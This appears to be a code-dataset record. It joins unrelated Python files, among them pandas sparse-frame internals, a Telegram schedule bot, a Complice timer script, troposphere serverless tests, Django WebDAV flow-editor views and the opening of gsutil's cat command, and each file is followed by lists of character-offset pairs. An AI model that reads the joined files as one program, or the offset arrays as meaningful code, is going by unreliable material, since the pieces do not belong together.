return self.apply(lambda x: x.cumsum(), axis=axis)
@Appender(generic._shared_docs['isna'] % _shared_doc_kwargs)
def isna(self):
return self._apply_columns(lambda x: x.isna())
isnull = isna
@Appender(generic._shared_docs['notna'] % _shared_doc_kwargs)
def notna(self):
return self._apply_columns(lambda x: x.notna())
notnull = notna
def apply(self, func, axis=0, broadcast=None, reduce=None,
result_type=None):
"""
Analogous to DataFrame.apply, for SparseDataFrame
Parameters
----------
func : function
Function to apply to each column
axis : {0, 1, 'index', 'columns'}
broadcast : bool, default False
For aggregation functions, return object of same size with values
propagated
.. deprecated:: 0.23.0
This argument will be removed in a future version, replaced
by result_type='broadcast'.
reduce : boolean or None, default None
Try to apply reduction procedures. If the DataFrame is empty,
apply will use reduce to determine whether the result should be a
Series or a DataFrame. If reduce is None (the default), apply's
return value will be guessed by calling func an empty Series (note:
while guessing, exceptions raised by func will be ignored). If
reduce is True a Series will always be returned, and if False a
DataFrame will always be returned.
.. deprecated:: 0.23.0
This argument will be removed in a future version, replaced
by result_type='reduce'.
result_type : {'expand', 'reduce', 'broadcast, None}
These only act when axis=1 {columns}:
* 'expand' : list-like results will be turned into columns.
* 'reduce' : return a Series if possible rather than expanding
list-like results. This is the opposite to 'expand'.
* 'broadcast' : results will be broadcast to the original shape
of the frame, the original index & columns will be retained.
The default behaviour (None) depends on the return value of the
applied function: list-like results will be returned as a Series
of those. However if the apply function returns a Series these
are expanded to columns.
.. versionadded:: 0.23.0
Returns
-------
applied : Series or SparseDataFrame
"""
if not len(self.columns):
return self
axis = self._get_axis_number(axis)
if isinstance(func, np.ufunc):
new_series = {}
for k, v in compat.iteritems(self):
applied = func(v)
applied.fill_value = func(v.fill_value)
new_series[k] = applied
return self._constructor(
new_series, index=self.index, columns=self.columns,
default_fill_value=self._default_fill_value,
default_kind=self._default_kind).__finalize__(self)
from pandas.core.apply import frame_apply
op = frame_apply(self,
func=func,
axis=axis,
reduce=reduce,
broadcast=broadcast,
result_type=result_type)
return op.get_result()
def applymap(self, func):
"""
Apply a function to a DataFrame that is intended to operate
elementwise, i.e. like doing map(func, series) for each series in the
DataFrame
Parameters
----------
func : function
Python function, returns a single value from a single value
Returns
-------
applied : DataFrame
"""
return self.apply(lambda x: lmap(func, x))
def to_manager(sdf, columns, index):
""" create and return the block manager from a dataframe of series,
columns, index
"""
# from BlockManager perspective
axes = [ensure_index(columns), ensure_index(index)]
return create_block_manager_from_arrays(
[sdf[c] for c in columns], columns, axes)
def stack_sparse_frame(frame):
"""
Only makes sense when fill_value is NaN
"""
lengths = [s.sp_index.npoints for _, s in compat.iteritems(frame)]
nobs = sum(lengths)
# this is pretty fast
minor_labels = np.repeat(np.arange(len(frame.columns)), lengths)
inds_to_concat = []
vals_to_concat = []
# TODO: Figure out whether this can be reached.
# I think this currently can't be reached because you can't build a
# SparseDataFrame with a non-np.NaN fill value (fails earlier).
for _, series in compat.iteritems(frame):
if not np.isnan(series.fill_value):
raise TypeError('This routine assumes NaN fill value')
int_index = series.sp_index.to_int_index()
inds_to_concat.append(int_index.indices)
vals_to_concat.append(series.sp_values)
major_labels = np.concatenate(inds_to_concat)
stacked_values = np.concatenate(vals_to_concat)
index = MultiIndex(levels=[frame.index, frame.columns],
labels=[major_labels, minor_labels],
verify_integrity=False)
lp = DataFrame(stacked_values.reshape((nobs, 1)), index=index,
columns=['foo'])
return lp.sort_index(level=0)
def homogenize(series_dict):
"""
Conform a set of SparseSeries (with NaN fill_value) to a common SparseIndex
corresponding to the locations where they all have data
Parameters
----------
series_dict : dict or DataFrame
Notes
-----
Using the dumbest algorithm I could think of. Should put some more thought
into this
Returns
-------
homogenized : dict of SparseSeries
"""
index = None
need_reindex = False
for _, series in compat.iteritems(series_dict):
if not np.isnan(series.fill_value):
raise TypeError('this method is only valid with NaN fill values')
if index is None:
index = series.sp_index
elif not series.sp_index.equals(index):
need_reindex = True
index = index.intersect(series.sp_index)
if need_reindex:
output = {}
for name, series in compat.iteritems(series_dict):
if not series.sp_index.equals(index):
series = series.sparse_reindex(index)
output[name] = series
else:
output = series_dict
return output
# use unaccelerated ops for sparse objects
ops.add_flex_arithmetic_methods(SparseDataFrame)
ops.add_special_arithmetic_methods(SparseDataFrame)
| [
[
[
125,
133
]
],
[
[
184,
192
],
[
16610,
16618
],
[
17895,
17903
]
],
[
[
219,
223
],
[
33798,
33802
]
],
[
[
243,
249
],
[
5628,
5634
],
[
6101,
6107
],
[
11815,
11821
],
[
12296,
12302
],
[
12548,
12554
],
[
13594,
13600
],
[
21815,
21821
],
[
25547,
25553
],
[
26245,
26251
],
[
32637,
32643
],
[
34279,
34285
],
[
34686,
34692
],
[
35876,
35882
],
[
36295,
36301
]
],
[
[
257,
268
],
[
23547,
23549
],
[
3142,
3144
],
[
3628,
3630
],
[
4752,
4754
],
[
6565,
6567
],
[
6795,
6797
],
[
6854,
6856
],
[
7982,
7984
],
[
10408,
10410
],
[
10543,
10545
],
[
10579,
10581
],
[
10616,
10618
],
[
20699,
20701
],
[
20829,
20831
],
[
20871,
20873
],
[
20979,
20981
],
[
21017,
21019
],
[
22072,
22074
],
[
22123,
22125
],
[
22190,
22192
],
[
24688,
24690
],
[
26147,
26149
],
[
32574,
32576
],
[
34374,
34376
],
[
34384,
34386
],
[
34726,
34728
],
[
34991,
34993
],
[
35043,
35045
],
[
35922,
35924
]
],
[
[
309,
313
],
[
21990,
21994
],
[
22016,
22020
]
],
[
[
315,
320
],
[
25175,
25180
]
],
[
[
357,
369
],
[
24631,
24643
]
],
[
[
371,
387
],
[
10194,
10210
]
],
[
[
426,
445
],
[
24080,
24099
]
],
[
[
447,
462
],
[
3326,
3341
]
],
[
[
496,
510
],
[
28963,
28965
],
[
29772,
29774
]
],
[
[
541,
546
],
[
4517,
4522
],
[
4648,
4653
],
[
5760,
5765
],
[
11372,
11377
],
[
11574,
11579
]
],
[
[
548,
558
],
[
35086,
35096
]
],
[
[
560,
572
],
[
4569,
4581
],
[
5569,
5581
],
[
34000,
34012
],
[
34023,
34035
]
],
[
[
604,
610
],
[
4089,
4095
],
[
6154,
6160
],
[
7725,
7731
],
[
15612,
15618
],
[
19301,
19307
],
[
27426,
27432
]
],
[
[
641,
650
],
[
1220,
1229
],
[
29265,
29274
],
[
3968,
3977
],
[
4450,
4459
],
[
11761,
11770
],
[
12335,
12344
],
[
35251,
35260
]
],
[
[
652,
665
],
[
5819,
5832
]
],
[
[
667,
680
],
[
7152,
7165
]
],
[
[
688,
719
],
[
26648,
26653
]
],
[
[
755,
767
],
[
4252,
4264
]
],
[
[
804,
836
],
[
34056,
34088
]
],
[
[
845,
875
],
[
29948,
29955
],
[
30107,
30114
],
[
5255,
5262
]
],
[
[
914,
926
],
[
5392,
5404
],
[
2635,
2647
],
[
6341,
6353
],
[
8071,
8083
],
[
8330,
8342
],
[
11872,
11884
],
[
15135,
15147
],
[
15712,
15724
]
],
[
[
928,
939
],
[
2649,
2660
],
[
4740,
4751
],
[
6430,
6441
],
[
15323,
15334
],
[
5899,
5910
],
[
14954,
14965
]
],
[
[
972,
982
],
[
8198,
8208
],
[
8478,
8488
]
],
[
[
984,
994
],
[
8019,
8029
]
],
[
[
1031,
1039
],
[
29256,
29264
],
[
29939,
29947
],
[
30098,
30106
]
],
[
[
1047,
1069
],
[
36568,
36571
],
[
36617,
36620
]
],
[
[
1077,
1102
],
[
5701,
5704
]
],
[
[
1110,
1143
],
[
8776,
8781
],
[
8849,
8854
]
],
[
[
1145,
1163
],
[
29979,
29997
],
[
30139,
30157
]
],
[
[
1204,
1219
],
[
36600,
36615
],
[
36652,
36667
],
[
2260,
2275
],
[
3749,
3764
],
[
5349,
5364
],
[
13005,
13020
],
[
13848,
13863
],
[
27557,
27572
]
],
[
[
33819,
33829
],
[
4937,
4947
],
[
6984,
6994
],
[
12000,
12010
]
],
[
[
34146,
34164
]
],
[
[
35385,
35395
]
]
] |
import time
import telebot
from Responses import TELE_HI_GREET, TELE_CLASS_CODE
import BacaPdf as pdf
import csvHandler as csvH
with open('API_KEY.txt') as API_KEY:
bot = telebot.TeleBot(API_KEY.read()[:-1])
#Message type check
#ClassCode, TimeInterval, Status, Feedback
messageBool = [False, False, False, False]
def Echooo(themessage):
for ID in csvH.AllID():
bot.send_message(ID, themessage)
def Greet(message):
print(message.text)
if (message.text).lower() in TELE_HI_GREET:
return True
return False
def ClassCode(message):
if (message.text).lower() in TELE_CLASS_CODE:
return True
return False
def TimeInterval(message):
message = (message.text).lower()
if message.isdigit():
return True
return False
def feedbackCatch(message):
if messageBool[3]:
return True
return False
#Commands
@bot.message_handler(commands=['start'])
def start(message):
bot.reply_to(message,"HEY! Welcome to bot Ukrida")
if csvH.checkID(message.chat.id) == 0:
classCom(message,True)
csvH.newID(message.chat.id,
message.chat.first_name,
message.chat.username,
"1PEEA", 10, 'active')
@bot.message_handler(commands=['classcode'])
def classCom(message, first = False):
global messageBool
messageBool = [True, False, False, False]
if first:
bot.send_message(message.chat.id, "Ketik kode kelasmu,\n(Contoh 1Peea):")
else:
bot.send_message(message.chat.id, "Ketik kode kelasmu, atau /cancel untuk membatalkan\n(Contoh 1Peea):")
@bot.message_handler(commands=['cancel'])
def cancelCom(message):
global messageBool
for x in messageBool:
if x:
messageBool = [False, False, False, False]
bot.send_message(message.chat.id, "OK :)")
return
@bot.message_handler(commands=['feedback'])
def feedbackCom(message):
global messageBool
messageBool = [False, False, False, True]
bot.send_message(message.chat.id, "Feedback, atau laporan error:")
@bot.message_handler(commands=['schedules'])
def schedulesCom(message,classCode=0):
if classCode == 0:
classCode = csvH.checkClass(message.chat.id)
queryClass = pdf.openFile(classCode)
if len(queryClass) > 0:
for kelas in queryClass:
sendTo = "Matkul: "+kelas[0]+"\n"
sendTo += "Waktu: "+kelas[1]+", "+kelas[2]+kelas[3]+"\n"
sendTo += "Dosen: "+kelas[4]+"\n"
if kelas[5] == "PTM":
sendTo += "Room:" + kelas[5]
elif kelas[5] == "Meet":
sendTo += "Room:" +'G'+ kelas[5]
            else:  # numeric meeting ID
sendTo += "MeetID: "+kelas[5]+"\n"
sendTo += "Pass: "+kelas[6]
bot.send_message(message.chat.id, sendTo)
bot.send_message(message.chat.id, "Selamat Kuliah!")
else:
bot.send_message(message.chat.id, "Maaf, kode kelas "+classCode.upper()+" belum ada di list.")
@bot.message_handler(commands=['timer', 'help'])
def notyetCom(message):
bot.send_message(message.chat.id, "Under Construction")
#Commands Child
@bot.message_handler(func=Greet)
def GreetCH(message):
bot.send_message(message.chat.id, "Halo "+message.chat.first_name+" :)")
@bot.message_handler(func=feedbackCatch)
def feedbackCH(message):
with open('feedback.txt','a') as f:
f.write(message.text)
#bot.send_message(895523970, str(message.chat.first_name)+":"+message.text)
bot.send_message(message.chat.id, "Pesan terkirim :)")
@bot.message_handler(func=ClassCode)
def ClassCH(message):
if messageBool[0]:
bot.send_message(message.chat.id, "OK, kelasmu tercatat: "+(message.text).upper())
schedulesCom(message,message.text)
csvH.changeClass(csvH.checkID(message.chat.id), (message.text).upper())
messageBool[0] = False
else:
bot.send_message(message.chat.id, "Ketik /classcode untuk mengganti kode kelas, atau /schedules untuk melihat jadwal kelasmu")
if __name__ == "__main__":
Echooo("Hi! Server On 7-12 Maret 2022")
# bot.infinity_polling()
# time.sleep(2)
| [
[
[
7,
11
]
],
[
[
22,
29
],
[
187,
194
]
],
[
[
55,
68
],
[
516,
529
]
],
[
[
70,
85
],
[
631,
646
]
],
[
[
94,
108
],
[
2333,
2336
]
],
[
[
117,
135
],
[
378,
382
],
[
1055,
1059
],
[
1132,
1136
],
[
2282,
2286
],
[
3916,
3920
],
[
3933,
3937
]
],
[
[
167,
174
],
[
203,
210
]
],
[
[
181,
184
],
[
930,
933
],
[
1286,
1289
],
[
1667,
1670
],
[
1936,
1939
],
[
2153,
2156
],
[
3112,
3115
],
[
3267,
3270
],
[
3408,
3411
],
[
3688,
3691
],
[
401,
404
],
[
996,
999
],
[
1464,
1467
],
[
1558,
1561
],
[
1868,
1871
],
[
2082,
2085
],
[
2888,
2891
],
[
2940,
2943
],
[
3013,
3016
],
[
3190,
3193
],
[
3327,
3330
],
[
3629,
3632
],
[
3780,
3783
],
[
4040,
4043
]
],
[
[
292,
303
],
[
860,
871
],
[
1771,
1782
],
[
3755,
3766
],
[
3997,
4008
]
],
[
[
343,
349
],
[
4202,
4208
]
],
[
[
441,
446
],
[
3292,
3297
]
],
[
[
577,
586
],
[
3713,
3722
]
],
[
[
694,
706
]
],
[
[
828,
841
],
[
3433,
3446
]
],
[
[
975,
980
]
],
[
[
1335,
1343
],
[
1100,
1108
]
],
[
[
1713,
1722
]
],
[
[
1984,
1995
]
],
[
[
2202,
2214
],
[
3872,
3884
]
],
[
[
3165,
3174
]
],
[
[
3304,
3311
]
],
[
[
3453,
3460
]
],
[
[
3729,
3736
]
],
[
[
1398,
1409
]
],
[
[
1812,
1823
]
],
[
[
2035,
2046
]
]
] |
#!/usr/bin/python3
# encoding: utf-8
### python script to interact with Complice
### giovanni, Saturday, April 10, 2021, 2:11 PM
### March 2022 updated to Python 3
import sys
from config import POMOLENGTH, TIMERLENGTH, TOKEN
import complice_post
myInput = sys.argv[1]
if myInput == "startTimer":
complice_post.start_hourglass()
if myInput == "startPomo":
complice_post.start_pomo()
if myInput == "Timer30":
complice_post.start_custom_hourglass30()
if myInput == "Timer60":
complice_post.start_custom_hourglass60()
if myInput == "runningTimerPause":
complice_post.pause_timer()
if myInput == "runningTimerCancel":
complice_post.cancel_timer()
if myInput == "pausedTimerCancel":
complice_post.cancel_timer()
if myInput == "restartTimer":
complice_post.restart_hourglass()
if myInput == "runningPomo":
complice_post.cancel_timer()
if myInput == "breaking":
complice_post.cancel_timer()
| [
[
[
174,
177
],
[
268,
271
]
],
[
[
197,
207
]
],
[
[
209,
220
]
],
[
[
222,
227
]
],
[
[
235,
248
],
[
313,
326
],
[
378,
391
],
[
440,
453
],
[
515,
528
],
[
596,
609
],
[
665,
678
],
[
734,
747
],
[
799,
812
],
[
867,
880
],
[
927,
940
]
],
[
[
258,
265
],
[
284,
291
],
[
350,
357
],
[
414,
421
],
[
489,
496
],
[
560,
567
],
[
628,
635
],
[
698,
705
],
[
768,
775
],
[
837,
844
],
[
900,
907
]
]
] |
import unittest
from troposphere import Tags, Template
from troposphere.s3 import Filter, Rules, S3Key
from troposphere.serverless import (
Api, DeadLetterQueue, DeploymentPreference, Function, FunctionForPackaging,
LayerVersion, S3Event, S3Location, SimpleTable,
)
class TestServerless(unittest.TestCase):
def test_exactly_one_code(self):
serverless_func = Function(
"SomeHandler",
Handler="index.handler",
Runtime="nodejs",
CodeUri=S3Location(
Bucket="mybucket",
Key="mykey",
),
InlineCode="",
)
t = Template()
t.add_resource(serverless_func)
with self.assertRaises(ValueError):
t.to_json()
def test_s3_location(self):
serverless_func = Function(
"SomeHandler",
Handler="index.handler",
Runtime="nodejs",
CodeUri=S3Location(
Bucket="mybucket",
Key="mykey",
)
)
t = Template()
t.add_resource(serverless_func)
t.to_json()
def test_tags(self):
serverless_func = Function(
"SomeHandler",
Handler="index.handler",
Runtime="nodejs",
CodeUri="s3://bucket/handler.zip",
Tags=Tags({
'Tag1': 'TagValue1',
'Tag2': 'TagValue2'
})
)
t = Template()
t.add_resource(serverless_func)
t.to_json()
def test_DLQ(self):
serverless_func = Function(
"SomeHandler",
Handler="index.handler",
Runtime="nodejs",
CodeUri="s3://bucket/handler.zip",
DeadLetterQueue=DeadLetterQueue(
Type='SNS',
TargetArn='arn:aws:sns:us-east-1:000000000000:SampleTopic'
)
)
t = Template()
t.add_resource(serverless_func)
t.to_json()
def test_required_function(self):
serverless_func = Function(
"SomeHandler",
Handler="index.handler",
Runtime="nodejs",
CodeUri="s3://bucket/handler.zip"
)
t = Template()
t.add_resource(serverless_func)
t.to_json()
def test_optional_auto_publish_alias(self):
serverless_func = Function(
"SomeHandler",
Handler="index.handler",
Runtime="nodejs",
CodeUri="s3://bucket/handler.zip",
AutoPublishAlias="alias"
)
t = Template()
t.add_resource(serverless_func)
t.to_json()
def test_optional_deployment_preference(self):
serverless_func = Function(
"SomeHandler",
Handler="index.handler",
Runtime="nodejs",
CodeUri="s3://bucket/handler.zip",
AutoPublishAlias="alias",
DeploymentPreference=DeploymentPreference(
Type="AllAtOnce"
)
)
t = Template()
t.add_resource(serverless_func)
t.to_json()
def test_required_api_definitionuri(self):
serverless_api = Api(
"SomeApi",
StageName='test',
DefinitionUri='s3://bucket/swagger.yml',
)
t = Template()
t.add_resource(serverless_api)
t.to_json()
swagger = {
"swagger": "2.0",
"info": {
"title": "swagger test",
},
"paths": {
"/test": {
"get": {
},
},
},
}
def test_required_api_both(self):
serverless_api = Api(
"SomeApi",
StageName='test',
DefinitionUri='s3://bucket/swagger.yml',
DefinitionBody=self.swagger,
)
t = Template()
t.add_resource(serverless_api)
with self.assertRaises(ValueError):
t.to_json()
def test_required_api_definitionbody(self):
serverless_api = Api(
"SomeApi",
StageName='test',
DefinitionBody=self.swagger,
)
t = Template()
t.add_resource(serverless_api)
t.to_json()
def test_api_no_definition(self):
serverless_api = Api(
"SomeApi",
StageName='test',
)
t = Template()
t.add_resource(serverless_api)
t.to_json()
def test_simple_table(self):
serverless_table = SimpleTable(
"SomeTable"
)
t = Template()
t.add_resource(serverless_table)
t.to_json()
def test_layer_version(self):
layer_version = LayerVersion(
"SomeLayer",
ContentUri="someuri",
)
t = Template()
t.add_resource(layer_version)
t.to_json()
layer_version = LayerVersion(
"SomeLayer",
)
t = Template()
t.add_resource(layer_version)
with self.assertRaises(ValueError):
t.to_json()
def test_s3_filter(self):
t = Template()
t.add_resource(
Function(
"ProcessorFunction",
Handler='process_file.handler',
CodeUri='.',
Runtime='python3.6',
Policies='AmazonS3FullAccess',
Events={
'FileUpload': S3Event(
'FileUpload',
Bucket="bucket",
Events=['s3:ObjectCreated:*'],
Filter=Filter(S3Key=S3Key(
Rules=[
Rules(Name="prefix", Value="upload/"),
Rules(Name="suffix", Value=".txt"),
],
))
)
}
)
)
t.to_json()
def test_policy_document(self):
t = Template()
t.add_resource(
Function(
"ProcessorFunction",
Handler='process_file.handler',
CodeUri='.',
Runtime='python3.6',
Policies="AmazonS3ReadOnly"
)
)
t.to_json()
t = Template()
t.add_resource(
Function(
"ProcessorFunction",
Handler='process_file.handler',
CodeUri='.',
Runtime='python3.6',
Policies=["AmazonS3FullAccess", "AmazonDynamoDBFullAccess"]
)
)
t.to_json()
t = Template()
t.add_resource(
Function(
"ProcessorFunction",
Handler='process_file.handler',
CodeUri='.',
Runtime='python3.6',
Policies={
"Statement": [{
"Effect": "Allow",
"Action": ["s3:GetObject", "s3:PutObject"],
"Resource": ["arn:aws:s3:::bucket/*"],
}]
},
)
)
t.to_json()
def test_packaging(self):
# test for no CodeUri or InlineCode
t = Template()
t.add_resource(
FunctionForPackaging(
"ProcessorFunction",
Handler='process_file.handler',
Runtime='python3.6',
Policies={
"Statement": [{
"Effect": "Allow",
"Action": ["s3:GetObject", "s3:PutObject"],
"Resource": ["arn:aws:s3:::bucket/*"],
}]
},
)
)
t.to_json()
if __name__ == '__main__':
unittest.main()
| [
[
[
7,
15
],
[
297,
305
],
[
7809,
7817
]
],
[
[
40,
44
],
[
1349,
1353
]
],
[
[
46,
54
],
[
644,
652
],
[
1058,
1066
],
[
1466,
1474
],
[
1923,
1931
],
[
2231,
2239
],
[
2587,
2595
],
[
3049,
3057
],
[
3326,
3334
],
[
3862,
3870
],
[
4175,
4183
],
[
4389,
4397
],
[
4579,
4587
],
[
4805,
4813
],
[
4960,
4968
],
[
5120,
5128
],
[
5994,
6002
],
[
6303,
6311
],
[
6644,
6652
],
[
7262,
7270
]
],
[
[
82,
88
],
[
5608,
5614
]
],
[
[
90,
95
],
[
5696,
5701
],
[
5767,
5772
]
],
[
[
97,
102
],
[
5621,
5626
]
],
[
[
144,
147
],
[
3193,
3196
],
[
3688,
3691
],
[
4054,
4057
],
[
4309,
4312
]
],
[
[
149,
164
],
[
1767,
1782
]
],
[
[
166,
186
],
[
2958,
2978
]
],
[
[
188,
196
],
[
380,
388
],
[
822,
830
],
[
1181,
1189
],
[
1588,
1596
],
[
2059,
2067
],
[
2377,
2385
],
[
2736,
2744
],
[
5167,
5175
],
[
6041,
6049
],
[
6350,
6358
],
[
6691,
6699
]
],
[
[
198,
218
],
[
7309,
7329
]
],
[
[
224,
236
],
[
4710,
4722
],
[
4899,
4911
]
],
[
[
238,
245
],
[
5434,
5441
]
],
[
[
247,
257
],
[
504,
514
],
[
946,
956
]
],
[
[
259,
270
],
[
4520,
4531
]
],
[
[
282,
296
]
]
] |
from django.shortcuts import render
from django.http import JsonResponse
from django.http import HttpResponse, HttpResponseNotFound
from django.contrib.auth.decorators import login_required
from floweditor.models import B1if
from easywebdavbiffy import *
import xmltodict
import StringIO
from zipfile import ZipFile
from xml.dom.minidom import parseString
# Renders work area, hands over list of b1if servers
@login_required
def index(request):
account_id = request.user.biffyuser.account.id
b1if_servers = B1if.objects.filter(account_id=account_id).order_by('name')
context = {
'b1if_servers': b1if_servers
}
return render(request, 'floweditor/workarea.html', context)
# Gets a list of scenarios - .vPac is the content for un-assigned flows
@login_required
def getScenarios(request):
b1if_server = B1if.objects.get(id=request.POST['server'])
if(b1if_server.account != request.user.biffyuser.account):
return HttpResponseNotFound();
#b1if_server = B1if.objects.get(id=1)
webdav = ewdconnect(b1if_server.server, port=b1if_server.port, username=b1if_server.user, password=b1if_server.password)
#print b1if_server.server+":"+b1if_server.port
folders = webdav.ls(b1if_server.path)
scenarios = []
for f in folders:
fname = f.name.rsplit('/')[-1]
# Folders starting with vPac. are scenarios, don't include SAP generated scenarios
if 'vPac.' in fname and not 'vPac.sap.' in fname:
scenarios.append(fname)
return JsonResponse({'scenarios':scenarios,'path':b1if_server.path})
# JSON Returns a list of flows for a scenario - read from the vBIU list in the scenario vPac file
@login_required
def getScenarioFlows(request):
b1if_server = B1if.objects.get(id=request.POST['server'])
if(b1if_server.account != request.user.biffyuser.account):
return HttpResponseNotFound();
webdav = ewdconnect(b1if_server.server, port=b1if_server.port, username=b1if_server.user, password=b1if_server.password)
path = b1if_server.path+request.POST['scenario']+'/vPac.xml'
virtual_file = StringIO.StringIO()
webdav.download(path,virtual_file)
file_contents = virtual_file.getvalue()
flows = []
doc = xmltodict.parse(file_contents)
#print doc['vPac']['vBIUList']
for vbiu in doc['vPac']['vBIUList']['vBIU']:
flows.append(vbiu['@Id'])
return JsonResponse({'flows':flows,'path':b1if_server.path,})
# JSON Returns a list of files for a scenario flow
@login_required
def getFlowFiles(request):
b1if_server = B1if.objects.get(id=request.POST['server'])
if(b1if_server.account != request.user.biffyuser.account):
return HttpResponseNotFound();
webdav = ewdconnect(b1if_server.server, port=b1if_server.port, username=b1if_server.user, password=b1if_server.password)
path = b1if_server.path+'vBIU.'+request.POST['flow']
folders = webdav.ls(path)
files = []
for f in folders:
fname = f.name.rsplit('/')[-1]
files.append(fname)
return JsonResponse({'files':files,'path':path})
# JSON Returns a files content
@login_required
def getFlowFileContent(request):
b1if_server = B1if.objects.get(id=request.POST['server'])
if(b1if_server.account != request.user.biffyuser.account):
return HttpResponseNotFound();
webdav = ewdconnect(b1if_server.server, port=b1if_server.port, username=b1if_server.user, password=b1if_server.password)
path = b1if_server.path+'vBIU.'+request.POST['flow']+'/'+request.POST['file']
virtual_file = StringIO.StringIO()
webdav.download(path,virtual_file)
return JsonResponse({'file_content':virtual_file.getvalue(),'path':path})
# JSON Saves a files content - returns True/False
# Writes the new file to .floweditor.xml (pro tip, the webdav server will Base64 encode
# your file if it doesn't end in .xml or .xsl)
# Will bail if the upload fails instead of overwriting the old file
# with a blank new file (severely painful past experience here)
# Deletes the old file and moves the new file to the old name
# Deletes old move files first
@login_required
def saveFlowFileContent(request):
b1if_server = B1if.objects.get(id=request.POST['server'])
if(b1if_server.account != request.user.biffyuser.account):
return HttpResponseNotFound();
webdav = ewdconnect(b1if_server.server, port=b1if_server.port, username=b1if_server.user, password=b1if_server.password)
path = b1if_server.path+'vBIU.'+request.POST['flow']+'/'+request.POST['file']
temp_path = b1if_server.path+'vBIU.'+request.POST['flow']+'/floweditor.'+request.POST['file']
new_file_content = request.POST['file_content']
if webdav.exists(temp_path)==True:
webdav.delete(temp_path)
virtual_file = StringIO.StringIO()
virtual_file.write(new_file_content)
webdav.upload(virtual_file,temp_path)
response = False
if webdav.exists(temp_path)==True:
webdav.delete(path)
webdav.move(temp_path,path)
response = True
return JsonResponse({'success':response})
@login_required
def downloadScenarioZip(request):
b1if_server = B1if.objects.get(id=request.POST['server'])
if(b1if_server.account != request.user.biffyuser.account):
return HttpResponseNotFound();
scenario = request.POST['scenario']
webdav = ewdconnect(b1if_server.server, port=b1if_server.port, username=b1if_server.user, password=b1if_server.password)
path = b1if_server.path+scenario
files = webdav.ls(path)
zipOutputFile = StringIO.StringIO()
zipFile = ZipFile(zipOutputFile, 'w')
#zipFile.writestr('/b1ifident.xml', 'test')
zipFile.writestr('/b1ifident.xml', '<?xml version="1.0" encoding="UTF-8"?><b1ifident xmlns:bfa="urn:com.sap.b1i.bizprocessor:bizatoms"><id>'+str(scenario.replace('vPac.',''))+'</id><type>vPac</type><ver>1.0.0</ver></b1ifident>')
for f in files:
virtual_file = StringIO.StringIO()
webdav.download(f.name,virtual_file)
zipFile.writestr(f.name.replace('/B1iXcellerator/exec/webdav',''), virtual_file.getvalue())
path = b1if_server.path+scenario+'/vPac.xml'
virtual_file = StringIO.StringIO()
webdav.download(path,virtual_file)
file_contents = virtual_file.getvalue()
doc = xmltodict.parse(file_contents)
#print doc['vPac']['vBIUList']
for vbiu in doc['vPac']['vBIUList']['vBIU']:
flow = vbiu['@Id']
path = b1if_server.path+'vBIU.'+flow
folders = webdav.ls(path)
for f in folders:
virtual_file = StringIO.StringIO()
webdav.download(f.name,virtual_file)
zipFile.writestr(f.name.replace('/B1iXcellerator/exec/webdav',''), virtual_file.getvalue())
zipFile.close()
zipOutputFile.seek(0)
#response = HttpResponse(zipOutputFile.read())
response = HttpResponse(zipOutputFile.getvalue())
response['Content-Disposition'] = 'attachment; filename=%s.zip' %(scenario)
response['Content-Type'] = 'application/x-zip'
return response
@login_required
def formatXML(request):
input_xml = request.POST['xml']
error = []
#xmlDom = xml.dom.minidom.parseString(input_xml)
formatted_xml = '\n'.join([line for line in parseString(input_xml).toprettyxml(indent=' '*2).split('\n') if line.strip()])
#formatted_xml = lambda formatted_xml: '\n'.join([line for line in parseString(formatted_xml).toprettyxml(indent=' '*2).split('\n') if line.strip()])
return JsonResponse({'formatted_xml':formatted_xml,'error':error}) | [
[
[
29,
35
],
[
629,
635
]
],
[
[
60,
72
],
[
1438,
1450
],
[
2259,
2271
],
[
2858,
2870
],
[
3414,
3426
],
[
4753,
4765
],
[
7009,
7021
]
],
[
[
97,
109
],
[
6408,
6420
]
],
[
[
111,
131
],
[
926,
946
],
[
1774,
1794
],
[
2537,
2557
],
[
3109,
3129
],
[
4073,
4093
],
[
4967,
4987
]
],
[
[
175,
189
],
[
411,
425
],
[
756,
770
],
[
1600,
1614
],
[
2367,
2381
],
[
2933,
2947
],
[
3896,
3910
],
[
4790,
4804
],
[
6592,
6606
]
],
[
[
220,
224
],
[
510,
514
],
[
813,
817
],
[
1661,
1665
],
[
2424,
2428
],
[
2996,
3000
],
[
3960,
3964
],
[
4854,
4858
]
],
[
[
253,
254
],
[
999,
1009
],
[
1808,
1818
],
[
2571,
2581
],
[
3143,
3153
],
[
4107,
4117
],
[
5039,
5049
]
],
[
[
262,
271
],
[
2114,
2123
],
[
5916,
5925
]
],
[
[
279,
287
],
[
1998,
2006
],
[
3350,
3358
],
[
4523,
4531
],
[
5227,
5235
],
[
5596,
5604
],
[
5812,
5820
],
[
6151,
6159
]
],
[
[
308,
315
],
[
5259,
5266
]
],
[
[
344,
355
],
[
6771,
6782
]
],
[
[
430,
435
]
],
[
[
775,
787
]
],
[
[
1619,
1635
]
],
[
[
2386,
2398
]
],
[
[
2952,
2970
]
],
[
[
3915,
3934
]
],
[
[
4809,
4828
]
],
[
[
6611,
6620
]
]
] |
# -*- coding: utf-8 -*-
# Copyright 2011 Google Inc. All Rights Reserved.
# Copyright 2011, Nexenta Systems Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Implementation of Unix-like cat command for cloud storage providers."""
from __future__ import absolute_import
import re
from gslib.cat_helper import CatHelper
from gslib.command import Command
from gslib.command_argument import CommandArgument
from gslib.cs_api_map import ApiSelector
from gslib.exception import CommandException
from gslib.util import NO_MAX
_SYNOPSIS = """
gsutil cat [-h] url...
"""
_DETAILED_HELP_TEXT = ("""
<B>SYNOPSIS</B>
""" + _SYNOPSIS + """
<B>DESCRIPTION</B>
The cat command outputs the contents of one or more URLs to stdout.
It is equivalent to doing:
gsutil cp url... -
(The final '-' causes gsutil to stream the output to stdout.)
<B>WARNING: DATA INTEGRITY CHECKING NOT DONE</B>
The gsutil cat command does not compute a checksum of the downloaded data.
Therefore, we recommend that users either perform their own validation of the
output of gsutil cat or use gsutil cp or rsync (both of which perform
integrity checking automatically).
<B>OPTIONS</B>
-h Prints short header for each object. For example:
gsutil cat -h gs://bucket/meeting_notes/2012_Feb/*.txt
This would print a header with the object name before the contents
of each text object that matched the wildcard.
-r range Causes gsutil to output just the specified byte range of the
             object. Ranges can be of these forms:
